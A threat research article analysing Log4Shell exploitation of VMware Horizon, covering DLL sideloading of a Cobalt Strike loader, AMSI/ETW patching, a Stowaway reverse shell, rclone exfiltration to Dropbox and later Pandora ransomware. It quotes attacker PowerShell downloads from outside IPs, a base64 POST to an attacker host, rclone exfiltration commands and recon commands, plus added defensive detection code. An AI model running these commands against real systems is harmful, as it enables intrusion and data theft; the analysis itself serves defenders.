Submitted URL: https://www.trendmicro.com/en_ae/research/22/g/log4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware....
LOG4SHELL VULNERABILITY IN VMWARE LEADS TO DATA EXFILTRATION AND RANSOMWARE

We analyzed cases of a Log4Shell vulnerability being exploited in certain
versions of the software VMware Horizon. Many of these attacks resulted in data
being exfiltrated from the infected systems. However, we also found that some of
the victims were infected with ransomware days after the data exfiltration.

By: Mohamed Fahmy June 28, 2022 Read time: 5 min (1464 words)

--------------------------------------------------------------------------------

Trend Micro Research recently analyzed several cases in which the Log4Shell
vulnerability was exploited in certain versions of VMware Horizon. After
investigating the chain of events, we found that many of these attacks resulted
in data being exfiltrated from the infected systems. We also found that some of
the victims were infected with ransomware days after the data exfiltration.

This investigation is related to a recent report from the security team Sentinel
Labs, which describes a technique used by the LockBit ransomware-as-a-service
(RaaS) that takes advantage of a command-line utility shipped with VMware. Their
investigation showed that this utility can be abused to sideload DLLs.

We observed behavior similar to what Sentinel Labs reported in terms of entry
points and sideloading, but the investigation discussed in this article focuses
on the exfiltration and lateral movement techniques.

Analyzing the attack kill chain

Entry point

The attack starts with the exploitation of the Log4j vulnerability (Log4Shell)
in VMware Horizon, which spawns a PowerShell instance to execute commands. The
threat actor uses PowerShell commands to perform discovery on the victim's
network, then downloads mfeann.exe, LockDown.DLL, and c0000012.log. Here are the
commands:

net group /domain
whoami

c:\windows\system32\net group /domain
c:\windows\system32\nltest /domain_trusts
c:\windows\system32\net user StantoDe /domain
c:\windows\system32\net time /domain

Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/mfeann.exe -OutFile C:\users\public\mfeann.exe
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/LockDown.DLL -OutFile C:\users\public\LockDown.DLL
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/c0000012.log -OutFile C:\users\public\c0000012.log

In the cases we analyzed, different legitimate executables were used to sideload
malicious DLLs. The file mfeann.exe is an executable responsible for event
creation and logging. It is legitimate and signed by a known security company,
but we found that threat actors misused it to sideload a malicious DLL named
LockDown.DLL. In another intrusion we analyzed, the threat actor downloaded a
different legitimate executable, VMwareXferlog.exe, and used the same technique
to sideload the malicious DLL glib-2.0.DLL.

Figure 1. Mfeann.exe signature information
Figure 2. VMwareXferlog.exe signature information

See the actions below:

Invoke-WebRequest -uri http://45.61.139.38/VMwareXferlogs.exe -OutFile c:\programdata\VMwareXferlogs.exe;
Invoke-WebRequest -uri http://45.61.139.38/glib-2.0.DLL -OutFile c:\programdata\glib-2.0.DLL;
Invoke-WebRequest -uri http://45.61.139.38/vmtools.ini -OutFile c:\programdata\vmtools.ini

The figure below shows the VMware Horizon Log4j exploitation, then the next step
of downloading the VMware utility and malicious DLL via PowerShell
(VMwareXferlog.exe and glib-2.0.DLL).


Figure 3. Process chain of infection (from TrendMicro Vision One)

Details of the DLL sideloading

Sideloading happens after the steps described earlier: the threat actor has
successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and
c0000012.log.

When mfeann.exe is executed, it calls the LockDownProtectProcessById function
exported by LockDown.DLL, and execution then flows into the malicious payload
inside LockDown.DLL. This is the process:

powershell -c curl -uri hxxp://45[.]61.137.57:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((C:\users\public\mfeann.exe)))))

Figure 4. Execution flow transferred to malicious LockDown.DLL via calling the
LockDownProtectProcessById function

The weaponized DLL checks for the presence of a debugger and tries to evade
managed detection and response (MDR) and Microsoft's Antimalware Scan Interface
(AMSI). It then decrypts c0000012.log, yielding a Cobalt Strike payload
(Sentinel Labs analyzed this in detail).

Here is a detailed sequence of actions:

1. The anti-debugging technique checks the BeingDebugged flag inside the PEB
structure.

Figure 5. Anti-debugging checks

2. Next, the loader tries to bypass AMSI and Event Tracing for Windows (ETW). It
evades both by patching the EtwEventWrite and AmsiScanBuffer APIs with a
return-from-procedure (RET) instruction, so that each call returns immediately
without logging or scanning anything. The following function is used to patch
both EtwEventWrite and AmsiScanBuffer:

Figure 6. Technique used to bypass ETW and AMSI

Figures 7 and 8 show EtwEventWrite before and after patching. 

Figure 7. EtwEventWrite before patching
Figure 8. EtwEventWrite after patching with a return instruction (0xC3)

3. Finally, the loader maps the encrypted Cobalt Strike payload into memory,
decrypts it, and loads it.

Figure 9. Function to map and decrypt the Cobalt Strike payload
Figure 10. The same function from glib-2.0.DLL, with a different encrypted file
name
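The tampering in step 2 can be checked for from the defender's side. The following Python is an added example (not code from Trend Micro or the article): it reads the first bytes of EtwEventWrite and AmsiScanBuffer inside the current process and flags an entry that has been overwritten with RET (0xC3), as Figure 8 shows; it generalizes slightly beyond the article by also flagging JMP and INT3 entries. The live reader uses ctypes and only works on Windows; the prologue bytes and the offline stand-in reader are constructed for the example.

```python
# Added example, not code from Trend Micro or the article: an in-process
# integrity check for the ETW/AMSI patch described in step 2. The byte samples
# at the bottom are constructed; the live reader needs Windows.
import ctypes
import sys

# First-byte signatures of an overwritten function entry. 0xC3 is the RET the
# article's loader writes; the JMP/INT3 cases are a small generalization.
ENTRY_SIGNATURES = {
    0xC3: "ret-patched (the EtwEventWrite/AmsiScanBuffer patch from Figure 8)",
    0xC2: "ret-imm16-patched",
    0xE9: "near-jmp hook",
    0xEB: "short-jmp hook",
    0xCC: "int3 breakpoint",
}
# Exports the loader neuters, and the module each one lives in.
WATCHED = (("ntdll.dll", "EtwEventWrite"), ("amsi.dll", "AmsiScanBuffer"))

def classify_entry(entry: bytes) -> str:
    """Describe the first instruction at a function entry; 'ok' if unremarkable."""
    if not entry:
        raise ValueError("empty entry bytes")
    return ENTRY_SIGNATURES.get(entry[0], "ok")

def read_entry_bytes(module: str, export: str, n: int = 8) -> bytes:
    """Read n bytes at module!export in this process (Windows only, via ctypes)."""
    if sys.platform != "win32":
        raise OSError("live entry inspection requires Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.LoadLibraryW.restype = ctypes.c_void_p
    k32.LoadLibraryW.argtypes = [ctypes.c_wchar_p]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    handle = k32.LoadLibraryW(module)  # returns the existing handle if already loaded
    if not handle:
        raise OSError(f"cannot load {module}: error {ctypes.get_last_error()}")
    addr = k32.GetProcAddress(handle, export.encode("ascii"))
    if not addr:
        raise OSError(f"{module}!{export} not found")
    return ctypes.string_at(addr, n)

def audit(reader=read_entry_bytes) -> dict:
    """Classify every watched export; `reader` is injectable for offline use."""
    return {f"{m}!{e}": classify_entry(reader(m, e)) for m, e in WATCHED}

# Constructed samples: a typical x64 prologue (mov r11, rsp; mov [r11+8], rbx)
# and the same bytes with the first one overwritten by RET, as in Figure 8.
CLEAN_PROLOGUE = bytes.fromhex("4c8bdc49895b08")
RET_PATCHED = bytes.fromhex("c3") + CLEAN_PROLOGUE[1:]

def fake_reader(module: str, export: str) -> bytes:
    """Offline stand-in for read_entry_bytes: ntdll clean, amsi patched."""
    return RET_PATCHED if module == "amsi.dll" else CLEAN_PROLOGUE

if __name__ == "__main__":
    reader = read_entry_bytes if sys.platform == "win32" else fake_reader
    for name, verdict in audit(reader).items():
        print(f"{name}: {verdict}")
```

A comparison against the on-disk export bytes is the more robust form of this check, since a patch can also be placed a few bytes into the function rather than at its first byte.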

Investigating notable techniques and tools 

Identical loaders


In the intrusions that used mfeann.exe along with LockDown.DLL, or
VMwareXferlog.exe with glib-2.0.DLL, both loaders were almost identical. 

Figure 11. Both loaders (the primary case showing the use of LockDown.DLL and
secondary showing the use of glib-2.0.DLL) are identical

Persistence

We also observed that the spawned WerFault.exe accessed lsass.exe, which
indicates that credentials might have been dumped. The threat actor also made
use of existing accounts, adding them to the domain admin group so that the
activity blended in with the environment.

Figure 12. Adding account to domain admin group

Lateral movement to machines in the network

After the initial infection with Cobalt Strike, we observed that the threat
actor dropped node.exe, which is the Stowaway proxy tool, publicly available on
GitHub. The tool is written in Go and gives threat actors many capabilities:
remote shell execution, file upload and download, and more. In this case, the
tool was used to provide a reverse shell to the threat actors at IP
45[.]32.108.54 on port 80.


After a successful connection with the command and control (C&C) IP, we saw
outbound traffic to several internal machines via SMB and WMI. The files
mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were
dropped on the identified internal machines. 

Data exfiltration 

In one case, we found an interesting binary named update.exe. The file is
actually the rclone.exe tool, used to exfiltrate data to a specific Dropbox
location. While uploading the data, the Rclone tool may connect to different
Dropbox IPs over time:

162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)

CLI commands:

cmd.exe /Q /c update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q --ignore-existing --max-age 2y --exclude *.exe 1> \\127.0.0.1\ADMIN$\__1649007856.0151849 2>&1

In another intrusion, the same tool was used for data exfiltration under a
different name: Medias.exe.

Medias.exe copy '\\[Private IP] \G$' dropbox:ag -q --ignore-existing --max-age 2y --auto-confirm --multi-thread-streams 12 --transfers 10 --ignore-errors --exclude "*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}"

Figure 13. Data exfiltration by the rclone.exe tool
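The stages above leave distinct traces in process-creation telemetry: the PowerShell spawned by Horizon and its domain discovery commands, downloads into C:\users\public and C:\programdata, the signed sideload hosts (mfeann.exe, VMwareXferlogs.exe) running from those staging directories, the Domain Admins addition, and the rclone argument signature that survives whatever the binary is renamed to (update.exe, Medias.exe). The Python below is an added example (not code from Trend Micro or the article) that turns each of those into a triage rule. The Horizon parent image (ws_TomcatService.exe), the sample events, the Domain Admins command form, and the documentation-range IP are assumptions constructed for the example.

```python
# Added example, not code from Trend Micro or the article: process-creation
# triage rules for the chain described in the article. All events below are
# constructed; the Horizon parent image path is an assumption.
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Legitimate signed binaries the article saw abused as sideload hosts.
SIDELOAD_HOSTS = ("mfeann.exe", "vmwarexferlogs.exe", "vmwarexferlog.exe")
# World-writable staging directories the downloads in the article landed in.
STAGING_DIRS = (r"c:\users\public", r"c:\programdata")
RECON = (r"net\s+group\s+/domain", r"nltest\s+/domain_trusts",
         r"net\s+user\s+\S+\s+/domain", r"net\s+time\s+/domain")
# rclone flags quoted in the article; >=2 beside a "copy" verb flag the tool whatever its name.
RCLONE_FLAGS = ("--ignore-existing", "--max-age", "--auto-confirm",
                "--multi-thread-streams", "--transfers", "--ignore-errors")

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def rules_for(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches, in fixed order."""
    hits, cl = [], ev.cmdline.lower()
    child, parent = _base(ev.image), _base(ev.parent)
    # 1. Horizon's web tier (assumed: ws_TomcatService.exe) spawning a shell
    if child in SHELLS and ("tomcat" in parent or "vmware" in ev.parent.lower()):
        hits.append("horizon_spawns_shell")
    # 2. domain discovery commands run from a shell
    if child in SHELLS and any(re.search(p, cl) for p in RECON):
        hits.append("domain_recon")
    # 3. web download written straight into a staging directory
    if ("invoke-webrequest" in cl or re.search(r"\bcurl\b", cl)) \
            and "-outfile" in cl and any(d in cl for d in STAGING_DIRS):
        hits.append("download_to_staging_dir")
    # 4. known sideload host executing outside its vendor install path
    if child in SIDELOAD_HOSTS and ev.image.lower().startswith(STAGING_DIRS):
        hits.append("sideload_host_in_staging_dir")
    # 5. rclone-style copy to a remote, independent of the binary's name
    if re.search(r"\bcopy\b", cl) and sum(f in cl for f in RCLONE_FLAGS) >= 2:
        hits.append("rclone_like_exfil")
    # 6. an account being added to Domain Admins (Figure 12 in the article)
    if re.search(r'net\s+group\s+"?domain admins"?\s+\S+\s+/add', cl):
        hits.append("domain_admin_add")
    return hits

def triage(events) -> dict:
    """Map event index -> matched rules, keeping only events that hit."""
    return {i: h for i, ev in enumerate(events) if (h := rules_for(ev))}

# Constructed sample telemetry modelled on the command lines quoted in the
# article; 192.0.2.10 is a documentation-range placeholder, not a real C&C.
HORIZON = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    ProcEvent(HORIZON, PS, r"powershell -c c:\windows\system32\nltest /domain_trusts"),
    ProcEvent(HORIZON, PS, r"powershell -c Invoke-WebRequest -uri http://192.0.2.10:443/mfeann.exe"
                           r" -OutFile C:\users\public\mfeann.exe"),
    ProcEvent(PS, r"C:\users\public\mfeann.exe", r"C:\users\public\mfeann.exe"),
    ProcEvent(PS, r"C:\Windows\System32\net.exe", 'net group "Domain Admins" svc_backup /add /domain'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\users\public\update.exe",
              r"update.exe copy J: 4:1 -q --ignore-existing --max-age 2y --exclude *.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -c Get-Process"),  # benign
]
```

Running triage(SAMPLE) flags the first five events and leaves the benign PowerShell launch untouched; a single event matching several rules (rules 1 and 2 on the first sample, for instance) is the pattern worth escalating first.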

After data exfiltration

In most of the analyzed intrusions, we saw the threat actors stop after the data
exfiltration phase. However, in one instance, we observed a Pandora ransomware
infection 10 days after the data was exfiltrated.

The sequence of events was as follows: first, the Stowaway tool was dropped
after the malicious DLL was sideloaded via the VMwareXferlog.exe utility. Then,
the Rclone tool (update.exe) was dropped and used for exfiltration. Ten days
later, we detected Pandora ransomware on the machine.

Attack stages

Figure 14. Timeline of data exfiltration and ransomware infection based on
investigated cases

We suspect that because there was a long period between exfiltration and
ransomware infection, there are threat actors who sell access to ransomware
groups after exfiltrating data. Selling access is nothing new in the underground
— once one threat actor is finished with their malicious activities, they can
sell their entry point to victims’ networks to other threat groups. 

Latest observed loader

While hunting for loaders similar to LockDown.DLL and glib-2.0.DLL, we found a
similar loader that was submitted to VirusTotal on June 22. The loader uses the
legitimate mfeann.exe tool to sideload a malicious LockDown.dll. The observed
sample was dropped in a way that differs from the Log4j exploit: this one was
dropped via the .NET trojan "UnLockApps.exe."

The trojan dropped three files at the location %appdata%\MfeannP1ugins:

 * mfeann.exe: A legitimate tool that sideloads the malicious LockDown.dll
 * LockDown.dll: A malicious DLL
 * avupdate_msg.avr: The encrypted Cobalt Strike payload

Although this LockDown.dll sample was created recently (June 5, 2022), it
doesn't appear to be as complex as the older sample discussed in the previous
sections. It does not check for a debugger or bypass security monitoring
solutions.

Figure 15. LockDownProtectProcessById function

This sample has the same main functionality as the previous one: it loads an
encrypted file and then decrypts it, resulting in a Cobalt Strike payload.

Figure 16. Opening avupdate_msg.avr
Figure 17. The decryption key
Figure 18. Payload decryption function
Figure 19. Decrypted Cobalt payload

Security Solutions

A multilayered approach can help organizations defend against this and other
ransomware attacks using security technologies that can detect malicious
components and suspicious behavior.


 * Trend Micro Vision One™ provides multilayered protection and behavior
   detection, which helps block suspicious behavior and tools before the
   ransomware can do any damage.
 * Trend Micro Cloud One™ Workload Security protects systems against both known
   and unknown threats that exploit vulnerabilities through virtual patching and
   machine learning.
 * Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and
   advanced analysis techniques to effectively block malicious emails that can
   serve as entry points for ransomware.
 * Trend Micro Apex One™ offers automated threat detection and response against
   advanced concerns such as fileless threats and ransomware, ensuring endpoint
   protection.

For a complete list of the Indicators of Compromise, please download this
document.

MITRE ATT&CK


Tags
Cloud | Exploits & Vulnerabilities | Research | Network | Articles, News,
Reports


AUTHORS

 * Mohamed Fahmy
   
   Threat Intelligence Analyst
